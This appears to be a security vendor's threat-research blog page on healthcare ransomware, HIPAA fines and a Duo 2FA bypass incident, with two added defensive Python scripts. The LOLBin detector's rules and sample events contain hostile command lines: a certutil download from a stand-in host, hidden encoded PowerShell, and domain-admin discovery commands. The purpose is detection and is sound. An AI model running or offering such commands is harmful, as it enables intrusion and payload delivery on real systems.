Articles written by Adlumin’s Threat Research Team on emerging threats, industry stats, and defense tactics against cyberattacks.

Adlumin’s Threat Insights 2024: Volume II

Adlumin’s Threat Insights 2024 Volume II highlights significant trends, cyberattacks, and vulnerabilities faced by U.S. and global sectors, as observed by Adlumin’s Threat Research Team for March, April and May 2024. Discover three emerging threats, each presenting unique challenges to cybersecurity professionals.

Stay informed and proactive to defend your organization’s assets against evolving cyber threats in a dynamic landscape.

Transforming Cutting-Edge Threat Research into Defense Strategies

Join our webinar on June 28th, 2024, focusing on cyber threats in educational institutions. Featuring insights from Adlumin’s Threat Research team and industry expert Mark Sangster, learn actionable strategies to strengthen your defenses. Topics include live demonstrations of MFA bypass techniques and tailored solutions for K-12 and higher education challenges.

Cybersecurity for Healthcare 2024: Mitigation Strategies

Industry Spotlight: Healthcare

In our quarterly industry spotlight series, we highlight the evolving threats faced by various industries and provide recommendations to enhance their security posture. Today, we shift our focus to the healthcare sector, a critical industry that faces unique challenges in safeguarding sensitive patient data and maintaining crucial healthcare operations. 

Mitigating cybersecurity risks is critical in the healthcare industry due to the highly sensitive nature of patient information stored within Electronic Health Records (EHRs) and the important role these systems play in patient care. Healthcare organizations are prime targets for cybercriminals seeking to exploit vulnerabilities for financial gain or disrupt essential services.  

Recent cyberattacks on healthcare organizations, like the Change Healthcare cyberattack, have demonstrated the growing sophistication and persistence of threat actors targeting this sector. Ransomware attacks, such as those leveraging Ransomware-as-a-Service (RaaS) and employing double extortion techniques, have caused significant disruptions and financial losses for healthcare providers. In response to these threats, organizations recognize the need to strengthen their cybersecurity defenses. 

Top Threat: Ransomware

Adlumin previously detailed significant trends and developments in the threats, vulnerabilities, and cyberattacks faced by the healthcare industry in the U.S., as observed from January to March 2024 by Adlumin’s Threat Research Team, in Cybersecurity for Healthcare: 2024 Threat Insights.

Healthcare Threat Highlights: 

  • Ransomware was identified as a top threat to the healthcare industry in the U.S. in Q1 2024 
  • Surge in ransomware attacks targeting healthcare organizations 
  • Increase in double extortion tactics by ransomware gangs like AlphV/BlackCat and BlackSuit 
  • Disruption of patient care operations and regulatory risks under HIPAA regulations 
  • Growing use of Living-Off-the-Land techniques by attackers to evade detection 
  • Emphasis on heightened security measures and preparedness to mitigate ransomware threats 

Shifting from the identification of ransomware as the top threat in the healthcare industry, Adlumin’s Threat Research Team has developed crucial mitigation strategies and recommendations to help healthcare organizations better defend against these malicious attacks. Let’s explore key strategies recommended by Adlumin’s experts to enhance cybersecurity resilience in the healthcare sector. 

Mitigation Strategies & Adlumin Recommendations 

Cybercriminals are continuously evolving their strategies, highlighting the importance for entities within the healthcare sector to remain alert and proactive. Adlumin’s key recommendations include:

  1. Practice Good Cyber Hygiene
    • Stay Informed of the Threat Landscape: Leverage resources from CISA, HHS 405(d), and the H-ISAC to enhance your organization’s resilience against formidable cyber threats and a complex threat landscape.
    • Regular Software Updates and Patch Management: Ensure that all software, especially operating systems and applications, is kept up to date with the latest patches to close security vulnerabilities.
    • Endpoint Protection Solutions: Deploy advanced endpoint protection platforms (EPPs) that include antivirus, antimalware, and EDR (Endpoint Detection and Response).
    • Network Segmentation: Segment networks to limit the spread of ransomware. Critical systems and sensitive data should reside in separate segments with strict access controls.
  2. Enhanced Detection and Response Capabilities
    • Security Monitoring and Anomaly Detection: Utilize security information and event management (SIEM) systems, along with AI and machine learning-based anomaly detection to identify unusual activity patterns indicative of a breach.
    • Integration of Managed Detection and Response (MDR) Systems: One of the key advantages of MDR systems is the ability to integrate and analyze security data from a wide range of sources, including endpoint systems, endpoint detection and response products, network devices, and more. This integration allows for a more comprehensive view of the security landscape, enabling the identification of complex attack patterns and subtle indicators of compromise that might be missed when these systems operate in isolation.
    • Implement a Zero Trust Architecture: Assume that threats can come from anywhere and verify every access request as if it originates from an open network. This involves strict identity verification, least privilege access, and micro-segmentation.
    • Incident Response Planning: Develop, maintain, and regularly test an incident response plan that includes procedures for ransomware attacks. This plan should outline roles, responsibilities, communication strategies, and recovery processes.
  3. Data Protection and Backup Strategies
    • Regular, Secure Backups: Maintain regular backups of critical data and systems, storing them in an isolated environment that is not accessible from the network where the primary data resides.
    • Immutable Backup Solutions: Use immutable backups where possible, ensuring that data cannot be altered or deleted after it’s written.
    • Encryption of Sensitive Data: Encrypt sensitive data both at rest and in transit to protect it from unauthorized access and reduce the impact of data theft.
    • Immutable Log Storage: Logs should be backed up and stored in a separate, immutable system to prevent tampering and assure their integrity.
  4. User Training and Awareness
    • Security Awareness Training: Conduct regular training sessions for all staff members on cybersecurity best practices, phishing awareness, and procedures for reporting suspicious activities.
    • Simulated Phishing Exercises: Carry out simulated phishing attacks to assess staff vigilance and reinforce training on identifying and responding to phishing attempts.
  5. Regulatory Compliance and Reporting
    • HIPAA Compliance: Ensure that all cybersecurity measures comply with HIPAA regulations to protect patient health information (PHI).
    • Breach Notification Procedures: Develop clear procedures for breach notification in compliance with regulatory requirements, ensuring timely communication with affected individuals and regulatory bodies.
  6. Special Attention to Emerging Threats
    • Monitor Emerging Ransomware Tactics: Stay informed about new ransomware tactics, such as double extortion and supply chain attacks, adapting defense mechanisms accordingly.
    • Evaluate Security of Third-Party Vendors: Conduct thorough security assessments of third-party vendors and insist on compliance with stringent security standards to mitigate supply chain risks.
    • Pay Special Attention to Electronic Health Records (EHR) Systems: EHRs like Epic present an enticing target to attackers, as they hold critically sensitive patient health data and enable healthcare operations. Strategies should be in place for isolating EHR-enabling systems from other machines and for dealing with potentially lengthy EHR system outages.

Eliminate Risks from One Centralized Location 

For healthcare organizations looking to amplify their cybersecurity resilience against the pervasive threat of ransomware and other evolving cyber threats, the implementation of a comprehensive and integrated security strategy is paramount. By leveraging a centralized Security Operations Platform that incorporates all the recommended mitigation strategies and practices, organizations can streamline their cybersecurity efforts and enhance their ability to detect, respond to, and mitigate potential threats effectively.  

Additionally, partnering with Managed Detection and Response (MDR) services can provide organizations with the expertise, tools, and continuous monitoring needed to mitigate risks, optimize threat response, and ensure a proactive defense against cyber threats. By adopting this holistic approach, healthcare organizations can strengthen their cybersecurity posture, safeguard patient data, and protect critical infrastructure in the face of threats. 

Adlumin ensures swift setup, unrivaled visibility spanning endpoints, users, and the perimeter, and provides contextual insights for rapid, informed decision-making.

Adlumin’s Threat Research Team is the innovator behind Adlumin’s comprehensive threat hunting to improve visibility, reduce complexity, and manage risk. The team proactively searches for cyber threats lurking undetected in your network environment. They dig deep to identify non-remediated threats and other malicious activities to reinforce security defenses. 

Cybersecurity for Healthcare: 2024 Threat Insights

The recent ransomware attack on UnitedHealth’s Change Healthcare subsidiary highlighted the attractiveness of the data-rich U.S. healthcare industry to cybercriminals and the severe impact on patients and doctors. Total expenses from the attack are expected to surpass $1 billion, including a $22 million ransomware payment. With cybercriminals leveraging sophisticated techniques to infiltrate systems, encrypt data, and extract sensitive information, the healthcare sector faces significant challenges in safeguarding patient records and maintaining operational efficiency.

This industry spotlight highlights significant trends and developments in the threats, vulnerabilities, and cyberattacks faced by the healthcare industry in the U.S., as observed from January to March 2024 by Adlumin’s Threat Research Team.

Industry Spotlight: The Healthcare Industry

Top Threat: Ransomware

Last year, the FBI’s Internet Crime Complaint Center released its latest report on Internet crimes and identified the healthcare and public health sectors as the most victimized by ransomware[1]. In fact, the healthcare sector had over 33% more reported victims than the second leading sector, critical manufacturing; 82% more than government facilities, and well more than double the number reported by the financial service sector. While waiting for the latest data reflecting 2023 cases, it’s almost certain that the healthcare sector will continue to see more ransomware attacks.

Ransomware gangs which operate under affiliate models often capture vital data, impose hefty ransoms for data retrieval, and significantly hinder patient care operations. The ransomware affiliate model resembles legitimate affiliate programs – hackers code the malware, while affiliates distribute it through Ransomware-as-a-Service (RaaS), then share the ransom profits. There may also be shared infrastructure for payout and money laundering operations. Combined, this lowers the barrier to entry for attackers and increases attack volume, fueling the overall threat.

Adlumin has observed wide adoption of a tactic known as double extortion in healthcare sector attacks. In double extortion operations, attackers encrypt sensitive and critical data as part of traditional ransomware operations, and exfiltrate or steal sensitive data. Ransomware actors then threaten public release of the data, meant to force payment of hefty ransoms even if defenders can recover encrypted data and systems from backups or other sources.

Adlumin has also observed ransomware operators increasingly threaten to report victims to regulatory authorities such as the SEC, resulting in almost certain fines if applicable under a host of old and new laws and regulations. Additionally, in investigating Play ransomware operations, Adlumin uncovered that ransomware attackers threaten to notify an organization’s partners and customers as part of ransom messages, a tactic meant to coerce payment. These factors can be especially important for those in the healthcare sector, as HIPAA (Health Insurance Portability and Accountability Act) can impose fines for data breaches involving protected health information (PHI). The four categories used for the penalty structure are:[2]

Tier   | Description                                                                                                                                                       | Fines per Violation*
Tier 1 | A violation that the covered entity was unaware of and could not have realistically avoided, had a reasonable amount of care been taken to abide by HIPAA Rules.   | $137 to $68,928
Tier 2 | A violation that the covered entity should have been aware of but could not have avoided even with a reasonable amount of care (but falling short of willful neglect of HIPAA Rules). | $1,379 to $68,928
Tier 3 | A violation suffered as a direct result of “willful neglect” of HIPAA Rules, in cases where an attempt has been made to correct the violation.                     | $13,785 to $68,928
Tier 4 | A violation of HIPAA Rules constituting willful neglect, where no attempt has been made to correct the violation within 30 days.                                   | $68,928 to $2,067,813

*Yearly cap of $2,067,813

Ransomware operators are also beginning to forgo encryption entirely, favoring data exfiltration and extortion operations. Both types have seen usage of Living-Off-the-Land (LOTL) techniques.

LOTL attacks are a stealthy tactic in which attackers exploit legitimate tools already present on a system, like PowerShell, the command prompt, or native binaries like certutil, to carry out malicious activities. These “Living Off the Land Binaries” (LOLBins) blend in with normal system operations, making them more difficult to detect and allowing attackers to steal data, move laterally within a network, or gain persistence without relying on easily identifiable malware.
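Because LOLBins are legitimate binaries, a detection cannot key on the file name alone; it has to look at how the binary is invoked and what launched it. The following script is an added example (not Adlumin’s code) that runs that logic over a handful of constructed process-creation events: it flags certutil, PowerShell, and cmd.exe only when their arguments or parent process fit abuse patterns, and leaves ordinary administrative use alone. The record layout (timestamp, host, user, parent, image, command_line) is an assumed simplified schema, not the Windows event format or any vendor’s.

```python
"""Flag suspicious Living-Off-the-Land binary (LOLBin) use in process-creation logs.

Added example, not Adlumin's code. The events are constructed for illustration
and the record layout (timestamp, host, user, parent, image, command_line) is an
assumed simplified schema, not any vendor's or Windows' own event format.
"""
import re
from dataclasses import dataclass
from typing import List


@dataclass
class ProcessEvent:
    timestamp: str
    host: str
    user: str
    parent: str        # image path of the parent process
    image: str         # image path of the created process
    command_line: str


# (binary, pattern over the command line, reason). The patterns are the kinds of
# argument shapes that turn a legitimate tool into a download, decode, or
# hidden-execution vehicle; a plain invocation of the same binary does not match.
LOLBIN_RULES = [
    ("certutil.exe",
     re.compile(r"-urlcache|-decode\b|-encode\b", re.I),
     "certutil used to fetch or transform a file"),
    ("powershell.exe",
     re.compile(r"-e(nc|ncodedcommand)?\b|-nop\b|-w(indowstyle)?\s+hidden|downloadstring|\biex\b", re.I),
     "PowerShell with encoded, hidden-window, or download arguments"),
    ("cmd.exe",
     re.compile(r"\b(whoami|nltest|quser)\b|\bnet\s+(user|group|localgroup)\b", re.I),
     "cmd.exe running account or domain discovery commands"),
]

# Parents from which an interpreter launch is rarely legitimate on a workstation.
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "mshta.exe", "wscript.exe"}
INTERPRETERS = {"powershell.exe", "cmd.exe", "certutil.exe"}


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def score_event(ev: ProcessEvent) -> List[str]:
    """Return the reasons an event looks like LOLBin abuse; an empty list means benign."""
    reasons = []
    image, parent = _basename(ev.image), _basename(ev.parent)
    for binary, pattern, reason in LOLBIN_RULES:
        if image == binary and pattern.search(ev.command_line):
            reasons.append(reason)
    if image in INTERPRETERS and parent in SUSPICIOUS_PARENTS:
        reasons.append(f"{image} spawned by {parent}")
    return reasons


def scan(events: List[ProcessEvent]):
    """Return (host, user, image, reasons) for every event with at least one finding."""
    findings = []
    for ev in events:
        reasons = score_event(ev)
        if reasons:
            findings.append((ev.host, ev.user, ev.image, reasons))
    return findings


# Constructed sample telemetry: two benign events followed by three suspicious ones.
SAMPLE_EVENTS = [
    ProcessEvent("2024-02-05T09:01:12Z", "WS-014", "CORP\\jdoe", r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -File C:\Scripts\backup.ps1"),
    ProcessEvent("2024-02-05T09:02:40Z", "WS-014", "CORP\\jdoe", r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\certutil.exe",
                 r"certutil.exe -verify C:\Temp\vendor.cer"),
    ProcessEvent("2024-02-05T09:15:03Z", "WS-021", "CORP\\asmith", r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\certutil.exe",
                 r"certutil.exe -urlcache -split -f http://example.invalid/update.dat C:\Users\Public\u.dat"),
    ProcessEvent("2024-02-05T09:15:09Z", "WS-021", "CORP\\asmith",
                 r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -nop -w hidden -enc QQBBAEEAQQA="),
    ProcessEvent("2024-02-05T09:16:30Z", "WS-021", "CORP\\asmith", r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\cmd.exe",
                 'cmd.exe /c whoami /all && net group "Domain Admins" /domain'),
]

if __name__ == "__main__":
    for host, user, image, reasons in scan(SAMPLE_EVENTS):
        print(f"{host} {user} {image}: {'; '.join(reasons)}")
```

The scheduled backup script and the certificate verification pass untouched, while the three abusive invocations are reported with the reason each rule fired. The parent-process rule is what catches the Office-spawned PowerShell even when the arguments are obfuscated, which is why a SIEM or EDR rule set for LOTL activity should combine command-line and process-tree conditions rather than rely on either alone.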

Healthcare Top Threats

AlphV/BlackCat

On December 19, 2023, the FBI announced disruption of RaaS operations carried out by AlphV (also known as “BlackCat”). The FBI seized several websites created by the group and gained visibility into the BlackCat ransomware group’s computer network as part of the investigation[3]. Additionally, authorities offered victims access to an FBI-developed decryption tool allowing for recovery of encrypted data.

In response, BlackCat called for open season against the healthcare sector, stating, “Because of their actions, we are introducing new rules, or rather, we are removing ALL rules except one, you cannot touch the CIS. You can now block hospitals, nuclear power plants, anything, anywhere.”[4]

On February 27, 2024, CISA, the FBI, and the Department of Health and Human Services (HHS), released a joint advisory which addressed BlackCat’s operations and attacks against the healthcare sector. They noted that, “Since mid-December 2023, of the nearly 70 leaked victims, the healthcare sector has been the most victimized. This is likely in response to the AlphV / Blackcat administrator’s post encouraging its affiliates to target hospitals after operational action against the group and its infrastructure in early December 2023.”[5]

In late February 2024, as part of attacks against the healthcare sector, insurance provider UnitedHealth found itself in the crosshairs of BlackCat operations. It was reported that the attack “had a knock-on effect on players across the U.S. healthcare system, as disruptions triggered by the attack have impacted electronic pharmacy refills and insurance transactions.”[6] In a quickly deleted post to its darknet-hosted website, BlackCat stated that it stole millions of sensitive records.

BlackSuit Ransomware

In November 2023, the Health Sector Cybersecurity Coordination Center (HC3) at the U.S. Department of Health and Human Services (HHS), released a detailed analysis on BlackSuit, a new ransomware strain that poses a credible threat to the healthcare and public health (HPH) sector.

BlackSuit emerged in May 2023 and exhibits significant parallels to the Royal ransomware family, which succeeded the infamous Conti group linked to Russia. BlackSuit’s ties to these active threat actors suggest ongoing, aggressive targeting of the healthcare industry. HC3 outlined BlackSuit’s operations, including its use of double extortion tactics, specific technical details, and potential impact on healthcare services, alongside recommended defenses and mitigation strategies.

As outlined in the HC3 report, BlackSuit’s impact could be significant, particularly if the group’s ties to the Royal and Conti ransomware families are confirmed. With its use of double extortion tactics, BlackSuit not only encrypts sensitive data on compromised healthcare networks but also threatens to leak stolen data unless a ransom is paid. This approach poses a dual threat: the immediate disruption of healthcare services due to inaccessible patient records and systems, and the long-term damage from the potential exposure of confidential patient data.

BlackSuit operates by encrypting sensitive data on compromised networks, employing a double extortion scheme that has so far targeted a limited number of victims across various sectors, including healthcare, in countries such as the U.S., Canada, Brazil, and the U.K. The analysis reveals BlackSuit’s operational techniques, encrypted file extensions, ransom demand methods, and its distribution via infected email attachments, torrent websites, malicious ads, and trojans.

Despite its limited use, the connections to Royal and Conti hint at a potentially significant threat landscape for the healthcare sector. Technical similarities with the Royal ransomware family, based on binary comparison tools, suggest BlackSuit could be a variant or affiliate of these larger, well-organized ransomware operations.

HHS emphasizes the importance of heightened security measures and preparedness within the healthcare industry to mitigate risks associated with ransomware attacks.

Recommendations to Eliminate Risks

To protect against evolving cyber threats in the healthcare sector, Adlumin recommends practicing good cyber hygiene by staying informed of the threat landscape, updating software regularly, implementing a Security Awareness Program, and deploying endpoint protection solutions.

Adlumin’s threat research team advises healthcare organizations to regularly update software, segment their networks, and plan for incident response. They also recommend implementing security monitoring, and anomaly detection tools. In addition, secure backups, encryption of sensitive data, and HIPAA compliance are crucial elements of a strong cybersecurity strategy.

With a deep understanding of the healthcare sector’s unique challenges and vulnerabilities, Adlumin stands as a reliable partner in strengthening cybersecurity posture and ensuring regulatory compliance. Partnering with Adlumin equips healthcare organizations with the necessary tools and expertise to combat ransomware and protect critical infrastructure effectively.

Stay tuned, Adlumin’s Threat Research team is releasing in-depth mitigation strategies for the healthcare sector.

Misconfiguration in Zero-Trust Solution Could Allow Threat Actors to Bypass 2FA

The Adlumin team recently investigated a security incident in which a malicious actor(s) successfully managed to gain unauthorized access to a company’s networks by completely bypassing Duo, a popular zero-trust security solution used by hundreds of organizations worldwide.

Background

The incident occurred in early February 2024 when threat actor(s) used two compromised sets of email credentials to log in remotely to the targeted company’s network from servers with IP addresses registered to Russia and Brazil. Subsequently, the company’s security tools, including Adlumin, generated several alerts for malicious activity detected within the network. This activity included credential brute forcing attempts, attacks against Microsoft Active Directory and Kerberos, and the use of Netscan to enumerate endpoints and servers.

Security teams responded to the alerts and successfully halted and locked out the threat actors before they could inflict more harm on the network, but questions remained as to why Duo’s two-factor authentication (2FA) was not prompted to verify the legitimacy of the login sessions which would have protected against compromised credential-based attacks.

Investigation Findings

The Adlumin investigation revealed that the two compromised email accounts used by the threat actor(s) were stale accounts which had been mistakenly configured with a policy that allows for unenrolled or partially enrolled users to authenticate into their network without 2FA.

According to Duo’s online documentation (last updated on Jan. 29, 2024), when the “New User Policy” is set to allow access without 2FA, users are not prompted to complete enrollment and are granted access without two-factor authentication.[1]

This type of user policy is made available to organizations for several reasons, including facilitating a gradual rollout of 2FA within the organization or a slow adoption of new zero-trust practices. However, it remains important to monitor events generated by users that bypass 2FA. Duo does offer such a monitoring feature to companies using Duo Premier, Duo Advantage, and Duo Essentials Plan.

With any 2FA solution, it’s important to consider the risks of enabling or using user policies that bypass it in any scope. Bypassing 2FA for certain users or scenarios reduces the overall security posture of the system and network. It can create fringe but exploitable instances where authentication relies solely on a single factor (e.g., username and password) that may be more susceptible to compromise – which was the case in the security incident investigated by Adlumin.

When users are not required to use 2FA, there is an increased vulnerability window. Attackers may exploit this period, especially if users with reduced authentication factors can enable access to sensitive information or critical systems.

In its online documentation, Duo does warn account owners and administrators who configure login access to remember that users with bypass status are not subject to restrictions and can bypass Duo authentication entirely.[2]

Conclusion

To protect against similar attacks at organizations that use Duo or other zero-trust solutions, Adlumin recommends that companies and organizations ensure user access policies are correctly configured and consider the security risks that come with allowing some users to bypass 2FA.

Organizations can avoid or reduce their exposure to an attack by practicing good account hygiene. This includes routinely conducting account reviews to identify and deactivate accounts that are no longer needed, establishing efficient communication between IT departments and human resources when employees leave an organization, and automating account provisioning and deprovisioning processes.
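The two gaps described in the investigation, a permissive new-user policy that lets unenrolled accounts log in with a single factor and stale accounts that nobody deprovisioned, are both things an administrator can enumerate from a user export. The script below is an added example (not Adlumin’s or Duo’s code) that audits a constructed list of user records for accounts in bypass status, unenrolled accounts under a permissive new-user policy, and accounts with no recent login, and then repeats the audit under the stricter policy to show what the configuration change alone does and does not fix. The record fields (username, status, is_enrolled, last_login) and the two policy values are assumptions modelled on the policy the article describes, not a specific product’s API contract.

```python
"""Audit 2FA coverage: find accounts that could log in with a single factor.

Added example, not Adlumin's or Duo's code. The user records are constructed,
and the fields (username, status, is_enrolled, last_login) and the policy
values are assumptions modelled on the policy described in the incident, not a
specific product's API contract.
"""
from datetime import datetime, timedelta, timezone
from typing import Dict, List, Optional, Tuple

# Assumed new-user policy values. The permissive one is what the incident
# describes: unenrolled users are granted access without a second factor.
ALLOW_WITHOUT_2FA = "allow_access_without_2fa"
REQUIRE_ENROLLMENT = "require_enrollment"

STALE_DAYS = 90  # threshold for "no recent login"; tune to the organization's review cycle


def audit_users(users: List[Dict], new_user_policy: str, now: datetime,
                stale_days: int = STALE_DAYS) -> List[Tuple[str, List[str]]]:
    """Return (username, reasons) for every enabled account that weakens 2FA coverage."""
    findings = []
    for u in users:
        if u["status"] == "disabled":
            continue  # cannot log in at all, so it does not widen the single-factor window
        reasons = []
        if u["status"] == "bypass":
            reasons.append("bypass status: never challenged for a second factor")
        elif not u["is_enrolled"] and new_user_policy == ALLOW_WITHOUT_2FA:
            reasons.append("unenrolled under permissive new-user policy: single-factor login possible")
        last: Optional[datetime] = u.get("last_login")
        if last is None:
            reasons.append("never logged in: enrollment may never be completed")
        elif now - last > timedelta(days=stale_days):
            reasons.append(f"stale account: no login in {stale_days} days")
        if reasons:
            findings.append((u["username"], reasons))
    return findings


def total_reasons(findings: List[Tuple[str, List[str]]]) -> int:
    """Count individual findings across all flagged accounts."""
    return sum(len(r) for _, r in findings)


NOW = datetime(2024, 2, 15, tzinfo=timezone.utc)  # fixed reference date for the constructed data

# Constructed user export: one healthy user, a forgotten service account, a
# bypass user, a never-enrolled account, and a properly disabled leaver.
SAMPLE_USERS = [
    {"username": "alice",      "status": "active",   "is_enrolled": True,  "last_login": NOW - timedelta(days=2)},
    {"username": "legacy-svc", "status": "active",   "is_enrolled": False, "last_login": NOW - timedelta(days=210)},
    {"username": "bob",        "status": "bypass",   "is_enrolled": True,  "last_login": NOW - timedelta(days=1)},
    {"username": "carol",      "status": "active",   "is_enrolled": False, "last_login": None},
    {"username": "dave",       "status": "disabled", "is_enrolled": False, "last_login": None},
]

if __name__ == "__main__":
    for policy in (ALLOW_WITHOUT_2FA, REQUIRE_ENROLLMENT):
        print(f"--- new-user policy: {policy}")
        for name, reasons in audit_users(SAMPLE_USERS, policy, NOW):
            print(f"{name}: {'; '.join(reasons)}")
```

Under the permissive policy the audit raises five findings across three accounts; switching to require enrollment removes the two single-factor findings but still leaves legacy-svc, bob and carol flagged for stale or bypass status. That residue is the account-hygiene point of the article: the policy change closes the 2FA gap, while the account reviews and deprovisioning remove the accounts an attacker would use it through.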

Indicators of Compromise (IOCs)